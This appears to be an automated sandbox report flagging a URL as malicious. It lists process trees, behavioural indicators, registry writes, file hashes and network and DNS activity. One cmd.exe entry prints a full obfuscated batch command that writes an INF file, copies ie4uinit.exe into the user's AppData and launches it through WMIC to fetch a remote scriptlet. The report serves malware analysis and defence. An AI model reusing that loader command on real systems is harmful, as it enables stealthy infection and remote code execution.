URL: 52.96.66.162:443

Full analysis: https://app.any.run/tasks/b5761633-6adb-4ab7-a321-d00b143d27b4
Verdict: Malicious activity
Analysis date: May 07, 2024, 17:29:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MD5: 30576FC0DCB7DCBA249B43905EEB6890
SHA1: 213583DB895CF5A429A86E314CE50A5D88A264F5
SHA256: 176EC42FE474D83D07AC2E800D21B567E1A1005CC1C06F8C36BDB7577B28F50A
SSDEEP: 3:CaeW:CaeW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • ie4uinit.exe (PID: 1816)
    • Changes the login/logoff helper path in the registry

      • regsvr32.exe (PID: 2736)
    • Reads the value of a key from the registry (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Creates internet connection object (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Opens an HTTP connection (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Accesses the network adapter (Win32_NetworkAdapter) via WMI (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Gets a file object corresponding to the file in a specified path (SCRIPT)

      • msxsl.exe (PID: 3384)
    • May hide the program window using WMI (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Sends HTTP request (SCRIPT)

      • msxsl.exe (PID: 3384)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 2256)
      • cmd.exe (PID: 1280)
      • regsvr32.exe (PID: 2736)
    • Process drops legitimate windows executable

      • xcopy.exe (PID: 2432)
    • Process copies executable file

      • cmd.exe (PID: 2412)
    • Application launched itself

      • cmd.exe (PID: 1280)
      • ie4uinit.exe (PID: 1816)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 2256)
      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)
    • Executable content was dropped or overwritten

      • xcopy.exe (PID: 2432)
      • ie4uinit.exe (PID: 1816)
      • regsvr32.exe (PID: 2736)
    • Executed via WMI

      • ie4uinit.exe (PID: 1816)
      • regsvr32.exe (PID: 2736)
      • msxsl.exe (PID: 3384)
      • typeperf.exe (PID: 2820)
    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 3388)
    • Reads the Internet Settings

      • WMIC.exe (PID: 1520)
      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)
    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • ie4uinit.exe (PID: 1816)
    • Writes binary data to a Stream object (SCRIPT)

      • ie4uinit.exe (PID: 1816)
    • Creates an object to access WMI (SCRIPT)

      • ie4uinit.exe (PID: 1816)
    • Changes charset (SCRIPT)

      • ie4uinit.exe (PID: 1816)
    • Saves data to a binary file (SCRIPT)

      • ie4uinit.exe (PID: 1816)
    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

      • ie4uinit.exe (PID: 1816)
    • Checks whether a specific file exists (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Accesses computer name via WMI (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Accesses current user name via WMI (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Reads settings of System Certificates

      • msxsl.exe (PID: 3384)
    • Checks Windows Trust Settings

      • msxsl.exe (PID: 3384)
    • Executes WMI query (SCRIPT)

      • msxsl.exe (PID: 3384)
    • Adds/modifies Windows certificates

      • msxsl.exe (PID: 3384)
  • INFO

    • The process uses the downloaded file

      • WinRAR.exe (PID: 2256)
      • msedge.exe (PID: 580)
    • Reads the computer name

      • wmpnscfg.exe (PID: 2556)
      • ie4uinit.exe (PID: 1816)
      • ie4uinit.exe (PID: 2696)
      • msxsl.exe (PID: 3384)
    • Application launched itself

      • msedge.exe (PID: 3984)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 2556)
      • notepad++.exe (PID: 116)
      • notepad++.exe (PID: 2920)
    • Checks supported languages

      • wmpnscfg.exe (PID: 2556)
      • ie4uinit.exe (PID: 1816)
      • ie4uinit.exe (PID: 2696)
      • msxsl.exe (PID: 3384)
    • Creates files or folders in the user directory

      • xcopy.exe (PID: 2432)
      • ie4uinit.exe (PID: 1816)
      • regsvr32.exe (PID: 2736)
      • msxsl.exe (PID: 3384)
    • Drops the executable file immediately after the start

      • xcopy.exe (PID: 2432)
      • regsvr32.exe (PID: 2736)
    • Checks proxy server information

      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)
    • Reads the machine GUID from the registry

      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)
    • Reads Environment values

      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)
    • Create files in a temporary directory

      • ie4uinit.exe (PID: 1816)
    • Reads the software policy settings

      • msxsl.exe (PID: 3384)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
All screenshots are available in the full report
Total processes: 96
Monitored processes: 52
Malicious processes: 4
Suspicious processes: 2

Behavior graph

(Interactive graph available in the full report; not reproduced here.) Processes shown in the graph, in order: msedge.exe (multiple instances), wmpnscfg.exe, winrar.exe, PhotoViewer.dll, cmd.exe, cmd.exe, cmd.exe, xcopy.exe, cmd.exe, cmd.exe, wmic.exe, ie4uinit.exe, ie4uinit.exe, regsvr32.exe, notepad++.exe, notepad++.exe, msxsl.exe, PhotoViewer.dll, cmd.exe, typeperf.exe.

Process information

Fields per process: PID, CMD, Path, Indicators, Parent process
PID:
112
CMD:
"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:2
Path:
C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID:
116
CMD:
"C:\Program Files\Notepad++\notepad++.exe" "C:\Windows\System32\cmd.exe"
Path:
C:\Program Files\Notepad++\notepad++.exe
Parent process:
explorer.exe
User:
admin
Company:
Don HO don.h@free.fr
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.91
Modules
Images
c:\program files\notepad++\notepad++.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID:
580
CMD:
"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:8
Path:
C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID:
764
CMD:
"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --first-renderer-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1
Path:
C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID:
768
CMD:
"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=3604 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1
Path:
C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID:
1060
CMD:
"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2232 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1
Path:
C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID:
1240
CMD:
"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3832 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1
Path:
C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID:
1280
CMD:
"C:\Windows\System32\cmd.exe" /v /c (for %t in (s) do @set "Signs=%~t") && !Signs!et "Physics=t" && !Signs!et "Clouds=a" && !Signs!et "Portraits=e" && (for %z in (c) do @!Signs!et "Fragile=%~z") && !Signs!et "Train=default" && !Signs!et "Salute=version" && (for %w in (a) do @!Signs!et "Pottery=%~w") && !Signs!et "Sheets=ure = " && !Signs!et "Excuse=d" && !Signs!et "Scrub=." && !Signs!et "Order=ni" && !Signs!et "Hypothesis=si" && !Signs!et "Rebates=$win" && !Signs!et "Efforts=settings" && !Signs!et "Guide=!Scrub!inf" && !Signs!et "Indicators=ieui!Order!t!Guide!" && c!Clouds!ll !Signs!et "Salaries=%!Pottery!ppd!Clouds!ta%\micro!Signs!oft\" && s!Portraits!t "Dizzy=!Salaries!!Indicators!" && (for %t in ("[3DC73B]" "sc\" "ro%Sight%j,NI,%Practitioners%%Fabric%%Fabric%p%Owners%%Limit%%Limit%jsb!Scrub!christianvelour!Scrub!%Americans%/hfksgtui" "[5EE5]" "ieu%Critics%!Guide!" "[!Excuse!e!Signs!tinationdirs]" "!Train!destdir=11" "5EE5=01" "[!Train!in!Signs!tall.windows7]" "Un\" "Register\" "OCXs=3DC73B" "!Excuse!elfil!Portraits!s=5EE5" "[s!Physics!ring!Signs!]" "Critics=i!Order!t" "Sight=b;Betray" "Fabric=t;Clerk" "Practitioners=h" "Americans=com" "Ritual=%time%" "Limit=/" "!Signs!ervicen!Pottery!me=' '" "!Signs!hortsvcn!Pottery!me=' '" "Owners=:;Provide" "[!Salute!]" "signat!Sheets!!Rebates!dows ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; ) do @e!Fragile!ho %~t)>"!Dizzy!" && !Signs!et "Class=ie4ui!Order!t.!Portraits!xe" && !Fragile!all x!Fragile!opy /Y /C /Q %win!Excuse!ir%\!Signs!ys!Physics!!Portraits!m32\!Class! "!Salaries!*" | !Signs!et Outputs7=Since && !Signs!t!Pottery!rt "" wmi!Fragile! proce!Signs!s call !Fragile!rea!Physics!e "!Salaries!!Class! -base!Efforts!" | !Signs!et "Outputs4=Peripherals Strike Politics Repairs Wives Other Remove Tomatoes Shove Faces Reopen Thunder Middle Bases Appear Promote Holmes Sports Cabbage Democrats Clinics Vocals Ripple Madness Bikes Nation Orchard Fetch Affair Pairs Envelope Leader Volunteers Davis Account Anger Develops Requests Wines Wellness Pieces Farmers Crunch Reforms Utils Outdoor Syrup Relations Information Briefs Couples Chunk Struggle Warrior Weekend Rides Obligations Builds Sibling Veterans Directories March Hollow Theaters Dynamics Continues Ranks Minds Codes"
Path:
C:\Windows\System32\cmd.exe
Parent process:
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID:
1288
CMD:
C:\Windows\system32\cmd.exe /S /D /c" set Outputs7=Since "
Path:
C:\Windows\System32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID:
1344
CMD:
"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3188 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1
Path:
C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events: 26 801
Read events: 26 478
Write events: 281
Delete events: 42

Modification events

(PID) Process: (3984) msedge.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Edge\BLBeacon
Operation: write
Name: failed_count
Value: 0

(PID) Process: (3984) msedge.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Edge\BLBeacon
Operation: write
Name: state
Value: 2

(PID) Process: (3984) msedge.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Edge\ThirdParty
Operation: write
Name: StatusCodes
Value:

(PID) Process: (3984) msedge.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Edge\ThirdParty
Operation: write
Name: StatusCodes
Value: 01000000

(PID) Process: (3984) msedge.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Edge\BLBeacon
Operation: write
Name: state
Value: 1

(PID) Process: (3984) msedge.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
Operation: write
Name: dr
Value: 1

(PID) Process: (3984) msedge.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Edge\StabilityMetrics
Operation: write
Name: user_experience_metrics.stability.exited_cleanly
Value: 0

(PID) Process: (3984) msedge.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation: write
Name: S-1-5-21-1302019708-1500728564-335382590-1000
Value: 0D56CACE76762F00

(PID) Process: (3984) msedge.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\FirstNotDefault
Operation: delete value
Name: S-1-5-21-1302019708-1500728564-335382590-1000
Value:

(PID) Process: (3984) msedge.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Edge
Operation: write
Name: UsageStatsInSample
Value: 1
Executable files: 3
Suspicious files: 127
Text files: 55
Unknown types: 7

Dropped files

PID | Process | Filename | Type
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Local State |
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF1041fc.TMP |
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old |
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF10422b.TMP |
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old |
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old~RF1042d7.TMP |
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old |
4008 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics.pma | binary
    MD5: C612E96CBFAC63232FC2062E15600FB1
    SHA256: DB3C05D5EC0B6719A73E7F0BE84BCE9342772DA70567E7CE08CF6573480B38FF
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old | text
    MD5: B2E1E436F8C0098B209AB866ADCDDEC4
    SHA256: 6D137151132C6D0847E71AE0438348FB624F4AABFE26228B637153353A266035
3984 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal | binary
    MD5: A366C186B8AD5582B4C1A53EA8622BF7
    SHA256: EDDFFE48B489FD18A5AA295B067ECE2959AE4DBEFCE9FF0134BA986FB98AA913
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 31
TCP/UDP connections: 83
DNS requests: 76
Threats: 4

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2032 | msedge.exe | GET | 52.96.66.162:443 | http://52.96.66.162:443/ | unknown | unknown
2032 | msedge.exe | GET | 52.96.66.162:443 | http://52.96.66.162:443/ | unknown | unknown
2032 | msedge.exe | GET | 52.96.66.162:443 | http://52.96.66.162:443/ | unknown | unknown
2032 | msedge.exe | GET | 52.96.66.162:443 | http://52.96.66.162:443/ | unknown | unknown
2032 | msedge.exe | GET | 301 | 52.96.66.162:80 | http://52.96.66.162/ | unknown | unknown
2032 | msedge.exe | GET | 204 | 13.107.6.158:80 | http://edge-http.microsoft.com/captiveportal/generate_204 | unknown | unknown
2032 | msedge.exe | GET | 200 | 142.11.194.191:80 | http://142.11.194.191/css/main.css | unknown | unknown
2032 | msedge.exe | GET | 200 | 142.11.194.191:80 | http://142.11.194.191/css/bootstrap-grid.min.css | unknown | unknown
2032 | msedge.exe | GET | 200 | 142.11.194.191:80 | http://142.11.194.191/css/reset.css | unknown | unknown
2032 | msedge.exe | GET | 200 | 142.11.194.191:80 | http://142.11.194.191/ | unknown | unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | whitelisted
| | 224.0.0.252:5355 | unknown
4 | System | 192.168.100.255:138 | whitelisted
1088 | svchost.exe | 224.0.0.252:5355 | unknown
2032 | msedge.exe | 52.96.66.162:443 | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown
3984 | msedge.exe | 239.255.255.250:1900 | unknown
2032 | msedge.exe | 13.107.42.16:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
2032 | msedge.exe | 13.107.21.239:443 | edge.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown
2032 | msedge.exe | 152.199.21.175:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | EDGECAST | DE | whitelisted
3984 | msedge.exe | 224.0.0.251:5353 | unknown

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 13.107.21.239
  • 204.79.197.239
whitelisted
www.bing.com
  • 2.16.65.200
  • 2.16.65.99
  • 2.16.65.219
  • 2.16.65.218
  • 2.16.65.201
  • 2.16.65.211
  • 2.16.65.203
  • 2.16.65.216
  • 2.16.65.210
  • 104.126.37.155
  • 104.126.37.177
  • 104.126.37.176
  • 104.126.37.170
  • 104.126.37.162
  • 104.126.37.153
  • 104.126.37.178
  • 104.126.37.160
  • 104.126.37.145
whitelisted
msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
  • 152.199.21.175
whitelisted
edge-http.microsoft.com
  • 13.107.6.158
whitelisted
outlook.office365.com
  • 52.97.189.66
  • 52.98.179.162
  • 52.98.178.226
whitelisted
login.microsoftonline.com
  • 40.126.32.133
  • 20.190.160.17
  • 20.190.160.20
  • 40.126.32.138
  • 20.190.160.22
  • 40.126.32.76
  • 40.126.32.136
  • 40.126.32.134
  • 20.190.159.64
  • 20.190.159.23
  • 20.190.159.73
  • 20.190.159.68
  • 40.126.31.69
  • 20.190.159.2
  • 20.190.159.0
  • 40.126.31.67
whitelisted
aadcdn.msauth.net
  • 13.107.246.45
  • 13.107.213.45
whitelisted
aadcdn.msftauth.net
  • 152.199.23.37
whitelisted
login.live.com
  • 20.190.160.20
  • 40.126.32.140
  • 40.126.32.68
  • 20.190.160.17
  • 40.126.32.133
  • 20.190.160.22
  • 20.190.160.14
  • 40.126.32.76
whitelisted

Threats

PID | Process | Class | Message
2032 | msedge.exe | Not Suspicious Traffic | INFO [ANY.RUN] A free CDN for open source projects (jsdelivr .net)
3 ETPRO signatures available at the full report
Process | Message
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe | ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe | ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled